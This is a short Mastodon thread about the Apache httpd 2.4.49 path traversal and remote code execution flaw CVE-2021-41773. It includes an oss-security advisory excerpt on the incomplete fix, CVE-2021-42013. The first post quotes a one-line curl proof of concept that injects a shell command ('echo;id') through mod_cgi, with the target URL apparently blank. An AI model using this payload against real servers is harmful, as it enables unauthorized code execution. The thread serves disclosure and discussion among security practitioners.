Ah, that over there was the CVE-2021-41773 Apache httpd 2.4.49 with mod-cgi PoC a couple of days ago:

curl --data "A=|echo;id" '' -vv
(Slightly optimized version from down that :birdsite: thread.)

Sure been a long time since I saw one of those 🙄


Subject: [oss-security] CVE-2021-42013: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)

It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.

@zwangseinweisung Yeah, the bug had been introduced in 2.4.49, so most distributions won't be affected.

Sign in to participate in the conversation
INFRa Mastodon

The social network of the future: No ads, no corporate surveillance, ethical design, and decentralization! Own your data with Mastodon!